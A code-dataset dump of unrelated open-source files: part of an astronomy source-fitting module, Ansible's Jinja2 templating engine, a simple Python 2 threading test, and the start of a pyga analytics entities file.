rex = RexGalaxy(src.getPosition(), src.getBrightness(),
LogRadius(-1.)).copy()
# logr, ee1, ee2
shape = LegacyEllipseWithPriors(-1., 0., 0.)
dev = DevGalaxy(src.getPosition(), src.getBrightness(), shape).copy()
exp = ExpGalaxy(src.getPosition(), src.getBrightness(), shape).copy()
oldmodel = 'psf'
elif isinstance(src, DevGalaxy):
rex = RexGalaxy(src.getPosition(), src.getBrightness(),
LogRadius(np.log(src.getShape().re))).copy()
dev = src.copy()
exp = ExpGalaxy(src.getPosition(), src.getBrightness(),
src.getShape()).copy()
oldmodel = 'dev'
elif isinstance(src, ExpGalaxy):
psf = PointSource(src.getPosition(), src.getBrightness()).copy()
rex = RexGalaxy(src.getPosition(), src.getBrightness(),
LogRadius(np.log(src.getShape().re))).copy()
dev = DevGalaxy(src.getPosition(), src.getBrightness(),
src.getShape()).copy()
exp = src.copy()
oldmodel = 'exp'
return oldmodel, psf, rex, dev, exp
def _get_subimages(tims, mods, src):
subtims = []
modelMasks = []
#print('Big blob: trimming:')
for tim,mod in zip(tims, mods):
if mod is None:
continue
mh,mw = mod.shape
if mh == 0 or mw == 0:
continue
# for modelMasks
d = { src: ModelMask(0, 0, mw, mh) }
modelMasks.append(d)
x0,y0 = mod.x0 , mod.y0
x1,y1 = x0 + mw, y0 + mh
subtim = _get_subtim(tim, x0, x1, y0, y1)
if subtim.shape != (mh,mw):
print('Subtim was not the shape expected:', subtim.shape,
'image shape', tim.getImage().shape, 'slice y', y0,y1,
'x', x0,x1, 'mod shape', mh,mw)
subtims.append(subtim)
return subtims, modelMasks
def _get_subtim(tim, x0, x1, y0, y1):
slc = slice(y0,y1), slice(x0, x1)
subimg = tim.getImage()[slc]
subpsf = tim.psf.constantPsfAt((x0+x1)/2., (y0+y1)/2.)
subtim = Image(data=subimg,
inverr=tim.getInvError()[slc],
wcs=tim.wcs.shifted(x0, y0),
psf=subpsf,
photocal=tim.getPhotoCal(),
sky=tim.sky.shifted(x0, y0),
name=tim.name)
sh,sw = subtim.shape
subtim.subwcs = tim.subwcs.get_subimage(x0, y0, sw, sh)
subtim.band = tim.band
subtim.sig1 = tim.sig1
subtim.x0 = x0
subtim.y0 = y0
subtim.fulltim = tim
subtim.meta = tim.meta
subtim.psf_sigma = tim.psf_sigma
if tim.dq is not None:
subtim.dq = tim.dq[slc]
subtim.dq_saturation_bits = tim.dq_saturation_bits
else:
subtim.dq = None
return subtim
class SourceModels(object):
'''
This class maintains a list of the model patches for a set of sources
in a set of images.
'''
def __init__(self):
self.filledModelMasks = True
def save_images(self, tims):
self.orig_images = [tim.getImage() for tim in tims]
for tim,img in zip(tims, self.orig_images):
tim.data = img.copy()
def restore_images(self, tims):
for tim,img in zip(tims, self.orig_images):
tim.data = img
def create(self, tims, srcs, subtract=False, modelmasks=None):
'''
Note that this modifies the *tims* if subtract=True.
'''
self.models = []
for itim,tim in enumerate(tims):
mods = []
sh = tim.shape
ie = tim.getInvError()
for src in srcs:
mm = None
if modelmasks is not None:
mm = modelmasks[itim].get(src, None)
mod = src.getModelPatch(tim, modelMask=mm)
if mod is not None and mod.patch is not None:
if not np.all(np.isfinite(mod.patch)):
print('Non-finite mod patch')
print('source:', src)
print('tim:', tim)
print('PSF:', tim.getPsf())
assert(np.all(np.isfinite(mod.patch)))
mod = _clip_model_to_blob(mod, sh, ie)
if subtract and mod is not None:
mod.addTo(tim.getImage(), scale=-1)
mods.append(mod)
self.models.append(mods)
def add(self, i, tims):
'''
Adds the models for source *i* back into the tims.
'''
for tim,mods in zip(tims, self.models):
mod = mods[i]
if mod is not None:
mod.addTo(tim.getImage())
def update_and_subtract(self, i, src, tims, tim_ies=None, ps=None):
for itim,(tim,mods) in enumerate(zip(tims, self.models)):
if src is None:
mods[i] = None
continue
if tim is None:
continue
mod = src.getModelPatch(tim)
mods[i] = mod
if mod is None:
continue
if tim_ies is not None:
# Apply an extra mask (ie, the mask_others segmentation mask)
ie = tim_ies[itim]
if ie is None:
continue
inslice, outslice = mod.getSlices(tim.shape)
p = mod.patch[inslice]
img = tim.getImage()
img[outslice] -= p * (ie[outslice]>0)
else:
mod.addTo(tim.getImage(), scale=-1)
# if mod.patch.max() > 1e6:
# if ps is not None:
# z = np.zeros_like(tim.getImage())
# import pylab as plt
# plt.clf()
# plt.suptitle('tim: %s' % tim.name)
# plt.subplot(2,2,1)
# plt.imshow(mod.patch, interpolation='nearest', origin='lower')
# plt.colorbar()
# plt.title('mod')
# plt.subplot(2,2,2)
# plt.imshow(tim.getImage(), interpolation='nearest', origin='lower')
# plt.colorbar()
# plt.title('tim (before)')
# mod.addTo(z, scale=1)
# plt.subplot(2,2,3)
# plt.imshow(z, interpolation='nearest', origin='lower')
# plt.colorbar()
# plt.title('mod')
# img = tim.getImage().copy()
# mod.addTo(img, scale=-1)
# plt.subplot(2,2,4)
# plt.imshow(img, interpolation='nearest', origin='lower')
# plt.colorbar()
# plt.title('tim-mod')
# ps.savefig()
def model_masks(self, i, src):
modelMasks = []
for mods in self.models:
d = dict()
modelMasks.append(d)
mod = mods[i]
if mod is not None:
if self.filledModelMasks:
mh,mw = mod.shape
d[src] = ModelMask(mod.x0, mod.y0, mw, mh)
else:
d[src] = ModelMask(mod.x0, mod.y0, mod.patch != 0)
return modelMasks
def remap_modelmask(modelMasks, oldsrc, newsrc):
mm = []
for mim in modelMasks:
d = dict()
mm.append(d)
try:
d[newsrc] = mim[oldsrc]
except KeyError:
pass
return mm
def _clip_model_to_blob(mod, sh, ie):
'''
mod: Patch
sh: tim shape
ie: tim invError
Returns: new Patch
'''
mslc,islc = mod.getSlices(sh)
sy,sx = mslc
patch = mod.patch[mslc] * (ie[islc]>0)
if patch.shape == (0,0):
return None
mod = Patch(mod.x0 + sx.start, mod.y0 + sy.start, patch)
# Check
mh,mw = mod.shape
assert(mod.x0 >= 0)
assert(mod.y0 >= 0)
ph,pw = sh
assert(mod.x0 + mw <= pw)
assert(mod.y0 + mh <= ph)
return mod
def _select_model(chisqs, nparams, galaxy_margin):
'''
Returns keepmod (string), the name of the preferred model.
'''
keepmod = 'none'
#print('_select_model: chisqs', chisqs)
# This is our "detection threshold": 5-sigma in
# *parameter-penalized* units; ie, ~5.2-sigma for point sources
cut = 5.**2
# Take the best of all models computed
diff = max([chisqs[name] - nparams[name] for name in chisqs.keys()
if name != 'none'] + [-1])
if diff < cut:
# Drop this source
return keepmod
# Now choose between point source and REX
if 'psf' in chisqs and not 'rex' in chisqs:
# bright stars / reference stars: we don't test the simple model.
return 'psf'
#print('PSF', chisqs.get('psf',0)-nparams['psf'], 'vs REX', chisqs.get('rex',0)-nparams['rex'])
# Is PSF good enough to keep?
if 'psf' in chisqs and (chisqs['psf']-nparams['psf'] >= cut):
keepmod = 'psf'
# Now choose between point source and REX
if 'psf' in chisqs and (
chisqs['psf']-nparams['psf'] >= chisqs.get('rex',0)-nparams['rex']):
#print('Keeping PSF')
keepmod = 'psf'
elif 'rex' in chisqs and (
chisqs['rex']-nparams['rex'] > chisqs.get('psf',0)-nparams['psf']):
#print('REX is better fit than PSF.')
oldkeepmod = keepmod
keepmod = 'rex'
# For REX, we also demand a fractionally better fit
dchisq_psf = chisqs.get('psf',0)
dchisq_rex = chisqs.get('rex',0)
if dchisq_psf > 0 and (dchisq_rex - dchisq_psf) < (0.01 * dchisq_psf):
#print('REX is not a fractionally better fit, keeping', oldkeepmod)
keepmod = oldkeepmod
if not ('exp' in chisqs or 'dev' in chisqs):
#print('No EXP or DEV; keeping', keepmod)
return keepmod
# This is our "upgrade" threshold: how much better a galaxy
# fit has to be versus psf
cut = galaxy_margin
# This is the "fractional" upgrade threshold for psf/rex to dev/exp:
# 1% of psf vs nothing
fcut = 0.01 * chisqs.get('psf', 0.)
cut = max(cut, fcut)
expdiff = chisqs.get('exp', 0) - chisqs[keepmod]
devdiff = chisqs.get('dev', 0) - chisqs[keepmod]
#print('EXP vs', keepmod, ':', expdiff)
#print('DEV vs', keepmod, ':', devdiff)
if not (expdiff > cut or devdiff > cut):
#print('Keeping', keepmod)
return keepmod
if expdiff > devdiff:
#print('Upgrading to EXP: diff', expdiff)
keepmod = 'exp'
else:
#print('Upgrading to DEV: diff', expdiff)
keepmod = 'dev'
# Consider Sersic models
if 'ser' not in chisqs:
return keepmod
serdiff = chisqs['ser'] - chisqs[keepmod]
sermargin = 25.
if serdiff < sermargin:
return keepmod
keepmod = 'ser'
return keepmod
def _chisq_improvement(src, chisqs, chisqs_none):
'''
chisqs, chisqs_none: dict of band->chisq
'''
bright = src.getBrightness()
bands = chisqs.keys()
fluxes = dict([(b, bright.getFlux(b)) for b in bands])
dchisq = 0.
for b in bands:
flux = fluxes[b]
if flux == 0:
continue
# this will be positive for an improved model
d = chisqs_none[b] - chisqs[b]
if flux > 0:
dchisq += d
else:
dchisq -= np.abs(d)
return dchisq
def _per_band_chisqs(tractor, bands):
chisqs = dict([(b,0) for b in bands])
for img in tractor.images:
chi = tractor.getChiImage(img=img)
chisqs[img.band] = chisqs[img.band] + (chi ** 2).sum()
return chisqs
| gpl-2.0 |
slohse/ansible | lib/ansible/template/__init__.py | 3 | 29684 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
import contextlib
import datetime
import os
import pwd
import re
import time
from functools import wraps
from io import StringIO
from numbers import Number
try:
from hashlib import sha1
except ImportError:
from sha import sha as sha1
from jinja2.exceptions import TemplateSyntaxError, UndefinedError
from jinja2.loaders import FileSystemLoader
from jinja2.runtime import Context, StrictUndefined
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleFilterError, AnsibleUndefinedVariable, AnsibleAssertionError
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils._text import to_native, to_text, to_bytes
from ansible.module_utils.common._collections_compat import Sequence, Mapping
from ansible.plugins.loader import filter_loader, lookup_loader, test_loader
from ansible.template.safe_eval import safe_eval
from ansible.template.template import AnsibleJ2Template
from ansible.template.vars import AnsibleJ2Vars
from ansible.utils.unsafe_proxy import UnsafeProxy, wrap_var
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['Templar', 'generate_ansible_template_vars']
# A regex for checking to see if a variable we're trying to
# expand is just a single variable name.
# Primitive Types which we don't want Jinja to convert to strings.
NON_TEMPLATED_TYPES = (bool, Number)
JINJA2_OVERRIDE = '#jinja2:'
USE_JINJA2_NATIVE = False
if C.DEFAULT_JINJA2_NATIVE:
try:
from jinja2.nativetypes import NativeEnvironment as Environment
from ansible.template.native_helpers import ansible_native_concat as j2_concat
USE_JINJA2_NATIVE = True
except ImportError:
from jinja2 import Environment
from jinja2.utils import concat as j2_concat
else:
from jinja2 import Environment
from jinja2.utils import concat as j2_concat
def generate_ansible_template_vars(path):
b_path = to_bytes(path)
try:
template_uid = pwd.getpwuid(os.stat(b_path).st_uid).pw_name
except (KeyError, TypeError):
template_uid = os.stat(b_path).st_uid
temp_vars = {}
temp_vars['template_host'] = to_text(os.uname()[1])
temp_vars['template_path'] = path
temp_vars['template_mtime'] = datetime.datetime.fromtimestamp(os.path.getmtime(b_path))
temp_vars['template_uid'] = to_text(template_uid)
temp_vars['template_fullpath'] = os.path.abspath(path)
temp_vars['template_run_date'] = datetime.datetime.now()
managed_default = C.DEFAULT_MANAGED_STR
managed_str = managed_default.format(
host=temp_vars['template_host'],
uid=temp_vars['template_uid'],
file=temp_vars['template_path'],
)
temp_vars['ansible_managed'] = to_text(time.strftime(to_native(managed_str), time.localtime(os.path.getmtime(b_path))))
return temp_vars
def _escape_backslashes(data, jinja_env):
"""Double backslashes within jinja2 expressions
A user may enter something like this in a playbook::
debug:
msg: "Test Case 1\\3; {{ test1_name | regex_replace('^(.*)_name$', '\\1')}}"
The string inside of the {{ gets interpreted multiple times First by yaml.
Then by python. And finally by jinja2 as part of it's variable. Because
it is processed by both python and jinja2, the backslash escaped
characters get unescaped twice. This means that we'd normally have to use
four backslashes to escape that. This is painful for playbook authors as
they have to remember different rules for inside vs outside of a jinja2
expression (The backslashes outside of the "{{ }}" only get processed by
yaml and python. So they only need to be escaped once). The following
code fixes this by automatically performing the extra quoting of
backslashes inside of a jinja2 expression.
"""
if '\\' in data and '{{' in data:
new_data = []
d2 = jinja_env.preprocess(data)
in_var = False
for token in jinja_env.lex(d2):
if token[1] == 'variable_begin':
in_var = True
new_data.append(token[2])
elif token[1] == 'variable_end':
in_var = False
new_data.append(token[2])
elif in_var and token[1] == 'string':
# Double backslashes only if we're inside of a jinja2 variable
new_data.append(token[2].replace('\\', '\\\\'))
else:
new_data.append(token[2])
data = ''.join(new_data)
return data
def _count_newlines_from_end(in_str):
'''
Counts the number of newlines at the end of a string. This is used during
the jinja2 templating to ensure the count matches the input, since some newlines
may be thrown away during the templating.
'''
try:
i = len(in_str)
j = i - 1
while in_str[j] == '\n':
j -= 1
return i - 1 - j
except IndexError:
# Uncommon cases: zero length string and string containing only newlines
return i
def tests_as_filters_warning(name, func):
'''
Closure to enable displaying a deprecation warning when tests are used as a filter
This closure is only used when registering ansible provided tests as filters
This function should be removed in 2.9 along with registering ansible provided tests as filters
in Templar._get_filters
'''
@wraps(func)
def wrapper(*args, **kwargs):
display.deprecated(
'Using tests as filters is deprecated. Instead of using `result|%(name)s` use '
'`result is %(name)s`' % dict(name=name),
version='2.9'
)
return func(*args, **kwargs)
return wrapper
class AnsibleContext(Context):
'''
A custom context, which intercepts resolve() calls and sets a flag
internally if any variable lookup returns an AnsibleUnsafe value. This
flag is checked post-templating, and (when set) will result in the
final templated result being wrapped via UnsafeProxy.
'''
def __init__(self, *args, **kwargs):
super(AnsibleContext, self).__init__(*args, **kwargs)
self.unsafe = False
def _is_unsafe(self, val):
'''
Our helper function, which will also recursively check dict and
list entries due to the fact that they may be repr'd and contain
a key or value which contains jinja2 syntax and would otherwise
lose the AnsibleUnsafe value.
'''
if isinstance(val, dict):
for key in val.keys():
if self._is_unsafe(val[key]):
return True
elif isinstance(val, list):
for item in val:
if self._is_unsafe(item):
return True
elif isinstance(val, string_types) and hasattr(val, '__UNSAFE__'):
return True
return False
def _update_unsafe(self, val):
if val is not None and not self.unsafe and self._is_unsafe(val):
self.unsafe = True
def resolve(self, key):
'''
The intercepted resolve(), which uses the helper above to set the
internal flag whenever an unsafe variable value is returned.
'''
val = super(AnsibleContext, self).resolve(key)
self._update_unsafe(val)
return val
def resolve_or_missing(self, key):
val = super(AnsibleContext, self).resolve_or_missing(key)
self._update_unsafe(val)
return val
class AnsibleEnvironment(Environment):
'''
Our custom environment, which simply allows us to override the class-level
values for the Template and Context classes used by jinja2 internally.
'''
context_class = AnsibleContext
template_class = AnsibleJ2Template
class Templar:
'''
The main class for templating, with the main entry-point of template().
'''
def __init__(self, loader, shared_loader_obj=None, variables=None):
variables = {} if variables is None else variables
self._loader = loader
self._filters = None
self._tests = None
self._available_variables = variables
self._cached_result = {}
if loader:
self._basedir = loader.get_basedir()
else:
self._basedir = './'
if shared_loader_obj:
self._filter_loader = getattr(shared_loader_obj, 'filter_loader')
self._test_loader = getattr(shared_loader_obj, 'test_loader')
self._lookup_loader = getattr(shared_loader_obj, 'lookup_loader')
else:
self._filter_loader = filter_loader
self._test_loader = test_loader
self._lookup_loader = lookup_loader
# flags to determine whether certain failures during templating
# should result in fatal errors being raised
self._fail_on_lookup_errors = True
self._fail_on_filter_errors = True
self._fail_on_undefined_errors = C.DEFAULT_UNDEFINED_VAR_BEHAVIOR
self.environment = AnsibleEnvironment(
trim_blocks=True,
undefined=StrictUndefined,
extensions=self._get_extensions(),
finalize=self._finalize,
loader=FileSystemLoader(self._basedir),
)
# the current rendering context under which the templar class is working
self.cur_context = None
self.SINGLE_VAR = re.compile(r"^%s\s*(\w*)\s*%s$" % (self.environment.variable_start_string, self.environment.variable_end_string))
self._clean_regex = re.compile(r'(?:%s|%s|%s|%s)' % (
self.environment.variable_start_string,
self.environment.block_start_string,
self.environment.block_end_string,
self.environment.variable_end_string
))
self._no_type_regex = re.compile(r'.*?\|\s*(?:%s)(?:\([^\|]*\))?\s*\)?\s*(?:%s)' %
('|'.join(C.STRING_TYPE_FILTERS), self.environment.variable_end_string))
def _get_filters(self, builtin_filters):
'''
Returns filter plugins, after loading and caching them if need be
'''
if self._filters is not None:
return self._filters.copy()
self._filters = dict()
# TODO: Remove registering tests as filters in 2.9
for name, func in self._get_tests().items():
if name in builtin_filters:
# If we have a custom test named the same as a builtin filter, don't register as a filter
continue
self._filters[name] = tests_as_filters_warning(name, func)
for fp in self._filter_loader.all():
self._filters.update(fp.filters())
return self._filters.copy()
def _get_tests(self):
'''
Returns tests plugins, after loading and caching them if need be
'''
if self._tests is not None:
return self._tests.copy()
self._tests = dict()
for fp in self._test_loader.all():
self._tests.update(fp.tests())
return self._tests.copy()
def _get_extensions(self):
'''
Return jinja2 extensions to load.
If some extensions are set via jinja_extensions in ansible.cfg, we try
to load them with the jinja environment.
'''
jinja_exts = []
if C.DEFAULT_JINJA2_EXTENSIONS:
# make sure the configuration directive doesn't contain spaces
# and split extensions in an array
jinja_exts = C.DEFAULT_JINJA2_EXTENSIONS.replace(" ", "").split(',')
return jinja_exts
def set_available_variables(self, variables):
'''
Sets the list of template variables this Templar instance will use
to template things, so we don't have to pass them around between
internal methods. We also clear the template cache here, as the variables
are being changed.
'''
if not isinstance(variables, dict):
raise AnsibleAssertionError("the type of 'variables' should be a dict but was a %s" % (type(variables)))
self._available_variables = variables
self._cached_result = {}
def template(self, variable, convert_bare=False, preserve_trailing_newlines=True, escape_backslashes=True, fail_on_undefined=None, overrides=None,
convert_data=True, static_vars=None, cache=True, disable_lookups=False):
'''
Templates (possibly recursively) any given data as input. If convert_bare is
set to True, the given data will be wrapped as a jinja2 variable ('{{foo}}')
before being sent through the template engine.
'''
static_vars = [''] if static_vars is None else static_vars
# Don't template unsafe variables, just return them.
if hasattr(variable, '__UNSAFE__'):
return variable
if fail_on_undefined is None:
fail_on_undefined = self._fail_on_undefined_errors
try:
if convert_bare:
variable = self._convert_bare_variable(variable)
if isinstance(variable, string_types):
result = variable
if self._contains_vars(variable):
# Check to see if the string we are trying to render is just referencing a single
# var. In this case we don't want to accidentally change the type of the variable
# to a string by using the jinja template renderer. We just want to pass it.
only_one = self.SINGLE_VAR.match(variable)
if only_one:
var_name = only_one.group(1)
if var_name in self._available_variables:
resolved_val = self._available_variables[var_name]
if isinstance(resolved_val, NON_TEMPLATED_TYPES):
return resolved_val
elif resolved_val is None:
return C.DEFAULT_NULL_REPRESENTATION
# Using a cache in order to prevent template calls with already templated variables
sha1_hash = None
if cache:
variable_hash = sha1(text_type(variable).encode('utf-8'))
options_hash = sha1(
(
text_type(preserve_trailing_newlines) +
text_type(escape_backslashes) +
text_type(fail_on_undefined) +
text_type(overrides)
).encode('utf-8')
)
sha1_hash = variable_hash.hexdigest() + options_hash.hexdigest()
if cache and sha1_hash in self._cached_result:
result = self._cached_result[sha1_hash]
else:
result = self.do_template(
variable,
preserve_trailing_newlines=preserve_trailing_newlines,
escape_backslashes=escape_backslashes,
fail_on_undefined=fail_on_undefined,
overrides=overrides,
disable_lookups=disable_lookups,
)
if not USE_JINJA2_NATIVE:
unsafe = hasattr(result, '__UNSAFE__')
if convert_data and not self._no_type_regex.match(variable):
# if this looks like a dictionary or list, convert it to such using the safe_eval method
if (result.startswith("{") and not result.startswith(self.environment.variable_start_string)) or \
result.startswith("[") or result in ("True", "False"):
eval_results = safe_eval(result, locals=self._available_variables, include_exceptions=True)
if eval_results[1] is None:
result = eval_results[0]
if unsafe:
result = wrap_var(result)
else:
# FIXME: if the safe_eval raised an error, should we do something with it?
pass
# we only cache in the case where we have a single variable
# name, to make sure we're not putting things which may otherwise
# be dynamic in the cache (filters, lookups, etc.)
if cache:
self._cached_result[sha1_hash] = result
return result
elif isinstance(variable, (list, tuple)):
return [self.template(
v,
preserve_trailing_newlines=preserve_trailing_newlines,
fail_on_undefined=fail_on_undefined,
overrides=overrides,
disable_lookups=disable_lookups,
) for v in variable]
elif isinstance(variable, (dict, Mapping)):
d = {}
# we don't use iteritems() here to avoid problems if the underlying dict
# changes sizes due to the templating, which can happen with hostvars
for k in variable.keys():
if k not in static_vars:
d[k] = self.template(
variable[k],
preserve_trailing_newlines=preserve_trailing_newlines,
fail_on_undefined=fail_on_undefined,
overrides=overrides,
disable_lookups=disable_lookups,
)
else:
d[k] = variable[k]
return d
else:
return variable
except AnsibleFilterError:
if self._fail_on_filter_errors:
raise
else:
return variable
def is_template(self, data):
''' lets us know if data has a template'''
if isinstance(data, string_types):
try:
new = self.do_template(data, fail_on_undefined=True)
except (AnsibleUndefinedVariable, UndefinedError):
return True
except:
return False
return (new != data)
elif isinstance(data, (list, tuple)):
for v in data:
if self.is_template(v):
return True
elif isinstance(data, dict):
for k in data:
if self.is_template(k) or self.is_template(data[k]):
return True
return False
def templatable(self, data):
'''
returns True if the data can be templated w/o errors
'''
templatable = True
try:
self.template(data)
except:
templatable = False
return templatable
def _contains_vars(self, data):
'''
returns True if the data contains a variable pattern
'''
if isinstance(data, string_types):
for marker in (self.environment.block_start_string, self.environment.variable_start_string, self.environment.comment_start_string):
if marker in data:
return True
return False
def _convert_bare_variable(self, variable):
'''
Wraps a bare string, which may have an attribute portion (ie. foo.bar)
in jinja2 variable braces so that it is evaluated properly.
'''
if isinstance(variable, string_types):
contains_filters = "|" in variable
first_part = variable.split("|")[0].split(".")[0].split("[")[0]
if (contains_filters or first_part in self._available_variables) and self.environment.variable_start_string not in variable:
return "%s%s%s" % (self.environment.variable_start_string, variable, self.environment.variable_end_string)
# the variable didn't meet the conditions to be converted,
# so just return it as-is
return variable
def _finalize(self, thing):
'''
A custom finalize method for jinja2, which prevents None from being returned. This
avoids a string of ``"None"`` as ``None`` has no importance in YAML.
If using ANSIBLE_JINJA2_NATIVE we bypass this and return the actual value always
'''
if USE_JINJA2_NATIVE:
return thing
return thing if thing is not None else ''
def _fail_lookup(self, name, *args, **kwargs):
raise AnsibleError("The lookup `%s` was found, however lookups were disabled from templating" % name)
def _query_lookup(self, name, *args, **kwargs):
''' wrapper for lookup, force wantlist true'''
kwargs['wantlist'] = True
return self._lookup(name, *args, **kwargs)
def _lookup(self, name, *args, **kwargs):
instance = self._lookup_loader.get(name.lower(), loader=self._loader, templar=self)
if instance is not None:
wantlist = kwargs.pop('wantlist', False)
allow_unsafe = kwargs.pop('allow_unsafe', C.DEFAULT_ALLOW_UNSAFE_LOOKUPS)
errors = kwargs.pop('errors', 'strict')
from ansible.utils.listify import listify_lookup_plugin_terms
loop_terms = listify_lookup_plugin_terms(terms=args, templar=self, loader=self._loader, fail_on_undefined=True, convert_bare=False)
# safely catch run failures per #5059
try:
ran = instance.run(loop_terms, variables=self._available_variables, **kwargs)
except (AnsibleUndefinedVariable, UndefinedError) as e:
raise AnsibleUndefinedVariable(e)
except Exception as e:
if self._fail_on_lookup_errors:
msg = u"An unhandled exception occurred while running the lookup plugin '%s'. Error was a %s, original message: %s" % \
(name, type(e), to_text(e))
if errors == 'warn':
display.warning(msg)
elif errors == 'ignore':
display.display(msg, log_only=True)
else:
raise AnsibleError(to_native(msg))
ran = None
if ran and not allow_unsafe:
if wantlist:
ran = wrap_var(ran)
else:
try:
ran = UnsafeProxy(",".join(ran))
except TypeError:
# Lookup Plugins should always return lists. Throw an error if that's not
# the case:
if not isinstance(ran, Sequence):
raise AnsibleError("The lookup plugin '%s' did not return a list."
% name)
# The TypeError we can recover from is when the value *inside* of the list
# is not a string
if len(ran) == 1:
ran = wrap_var(ran[0])
else:
ran = wrap_var(ran)
if self.cur_context:
self.cur_context.unsafe = True
return ran
else:
raise AnsibleError("lookup plugin (%s) not found" % name)
def do_template(self, data, preserve_trailing_newlines=True, escape_backslashes=True, fail_on_undefined=None, overrides=None, disable_lookups=False):
if USE_JINJA2_NATIVE and not isinstance(data, string_types):
return data
# For preserving the number of input newlines in the output (used
# later in this method)
if not USE_JINJA2_NATIVE:
data_newlines = _count_newlines_from_end(data)
else:
data_newlines = None
if fail_on_undefined is None:
fail_on_undefined = self._fail_on_undefined_errors
try:
# allows template header overrides to change jinja2 options.
if overrides is None:
myenv = self.environment.overlay()
else:
myenv = self.environment.overlay(overrides)
# Get jinja env overrides from template
if hasattr(data, 'startswith') and data.startswith(JINJA2_OVERRIDE):
eol = data.find('\n')
line = data[len(JINJA2_OVERRIDE):eol]
data = data[eol + 1:]
for pair in line.split(','):
(key, val) = pair.split(':')
key = key.strip()
setattr(myenv, key, ast.literal_eval(val.strip()))
# Adds Ansible custom filters and tests
myenv.filters.update(self._get_filters(myenv.filters))
myenv.tests.update(self._get_tests())
if escape_backslashes:
# Allow users to specify backslashes in playbooks as "\\" instead of as "\\\\".
data = _escape_backslashes(data, myenv)
try:
t = myenv.from_string(data)
except TemplateSyntaxError as e:
raise AnsibleError("template error while templating string: %s. String: %s" % (to_native(e), to_native(data)))
except Exception as e:
if 'recursion' in to_native(e):
raise AnsibleError("recursive loop detected in template string: %s" % to_native(data))
else:
return data
if disable_lookups:
t.globals['query'] = t.globals['q'] = t.globals['lookup'] = self._fail_lookup
else:
t.globals['lookup'] = self._lookup
t.globals['query'] = t.globals['q'] = self._query_lookup
t.globals['finalize'] = self._finalize
jvars = AnsibleJ2Vars(self, t.globals)
self.cur_context = new_context = t.new_context(jvars, shared=True)
rf = t.root_render_func(new_context)
try:
res = j2_concat(rf)
if getattr(new_context, 'unsafe', False):
res = wrap_var(res)
except TypeError as te:
if 'StrictUndefined' in to_native(te):
errmsg = "Unable to look up a name or access an attribute in template string (%s).\n" % to_native(data)
errmsg += "Make sure your variable name does not contain invalid characters like '-': %s" % to_native(te)
raise AnsibleUndefinedVariable(errmsg)
else:
display.debug("failing because of a type error, template data is: %s" % to_native(data))
raise AnsibleError("Unexpected templating type error occurred on (%s): %s" % (to_native(data), to_native(te)))
if USE_JINJA2_NATIVE:
return res
if preserve_trailing_newlines:
# The low level calls above do not preserve the newline
# characters at the end of the input data, so we use the
# calculate the difference in newlines and append them
# to the resulting output for parity
#
# jinja2 added a keep_trailing_newline option in 2.7 when
# creating an Environment. That would let us make this code
# better (remove a single newline if
# preserve_trailing_newlines is False). Once we can depend on
# that version being present, modify our code to set that when
# initializing self.environment and remove a single trailing
# newline here if preserve_newlines is False.
res_newlines = _count_newlines_from_end(res)
if data_newlines > res_newlines:
res += self.environment.newline_sequence * (data_newlines - res_newlines)
return res
except (UndefinedError, AnsibleUndefinedVariable) as e:
if fail_on_undefined:
raise AnsibleUndefinedVariable(e)
else:
display.debug("Ignoring undefined failure: %s" % to_text(e))
return data
# for backwards compatibility in case anyone is using old private method directly
_do_template = do_template
| gpl-3.0 |
sensysnetworks/uClinux | user/python/Lib/test/test_thread.py | 12 | 2492 | # Very rudimentary test of thread module
# Create a bunch of threads, let each do some work, wait until all are done
from test_support import verbose
import random
import thread
import time
mutex = thread.allocate_lock()
rmutex = thread.allocate_lock() # for calls to random
running = 0
done = thread.allocate_lock()
done.acquire()
numtasks = 10
def task(ident):
global running
rmutex.acquire()
delay = random.random() * numtasks
rmutex.release()
if verbose:
print 'task', ident, 'will run for', round(delay, 1), 'sec'
time.sleep(delay)
if verbose:
print 'task', ident, 'done'
mutex.acquire()
running = running - 1
if running == 0:
done.release()
mutex.release()
next_ident = 0
def newtask():
global next_ident, running
mutex.acquire()
next_ident = next_ident + 1
if verbose:
print 'creating task', next_ident
thread.start_new_thread(task, (next_ident,))
running = running + 1
mutex.release()
for i in range(numtasks):
newtask()
print 'waiting for all tasks to complete'
done.acquire()
print 'all tasks done'
class barrier:
def __init__(self, n):
self.n = n
self.waiting = 0
self.checkin = thread.allocate_lock()
self.checkout = thread.allocate_lock()
self.checkout.acquire()
def enter(self):
checkin, checkout = self.checkin, self.checkout
checkin.acquire()
self.waiting = self.waiting + 1
if self.waiting == self.n:
self.waiting = self.n - 1
checkout.release()
return
checkin.release()
checkout.acquire()
self.waiting = self.waiting - 1
if self.waiting == 0:
checkin.release()
return
checkout.release()
numtrips = 3
def task2(ident):
global running
for i in range(numtrips):
if ident == 0:
# give it a good chance to enter the next
# barrier before the others are all out
# of the current one
delay = 0.001
else:
rmutex.acquire()
delay = random.random() * numtasks
rmutex.release()
if verbose:
print 'task', ident, 'will run for', round(delay, 1), 'sec'
time.sleep(delay)
if verbose:
print 'task', ident, 'entering barrier', i
bar.enter()
if verbose:
print 'task', ident, 'leaving barrier', i
mutex.acquire()
running = running - 1
if running == 0:
done.release()
mutex.release()
print '\n*** Barrier Test ***'
if done.acquire(0):
raise ValueError, "'done' should have remained acquired"
bar = barrier(numtasks)
running = numtasks
for i in range(numtasks):
thread.start_new_thread(task2, (i,))
done.acquire()
print 'all tasks done'
| gpl-2.0 |
brysonreece/Stream | resources/site-packages/pyga/entities.py | 16 | 19442 | # -*- coding: utf-8 -*-
from datetime import datetime
from operator import itemgetter
from urlparse import urlparse
from urllib import unquote_plus
from pyga import utils
from pyga import exceptions
__author__ = "Arun KR (kra3) <the1.arun@gmail.com>"
__license__ = "Simplified BSD"
class Campaign(object):
'''
A representation of Campaign
Properties:
_type -- See TYPE_* constants, will be mapped to "__utmz" parameter.
